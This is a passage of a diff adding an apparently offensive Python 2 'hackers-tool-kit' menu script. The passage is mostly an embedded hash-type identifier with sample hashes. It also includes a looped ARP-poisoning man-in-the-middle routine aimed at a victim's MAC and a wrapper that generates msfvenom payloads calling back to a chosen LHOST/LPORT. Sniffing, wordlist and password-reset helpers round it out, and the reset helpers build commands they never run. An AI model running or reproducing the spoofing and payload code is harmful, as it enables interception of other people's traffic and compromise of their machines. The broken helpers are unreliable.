/proc/sys/net/ipv4/ip_forward") + print "[!] Couldn't Find Gateway MAC Address" + print "[!] Exiting..." + os.system("clear") + mainbanner() + print "[*] Poisoning Targets..." + while 1: + try: + trick(gateMAC, victimMAC) + time.sleep(1.5) + except KeyboardInterrupt: + reARP() + break + mitm() +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + os.system("cat /root/hackers-tool-kit/tools/formats.txt") + s = raw_input("Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) + os.system(a) +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and 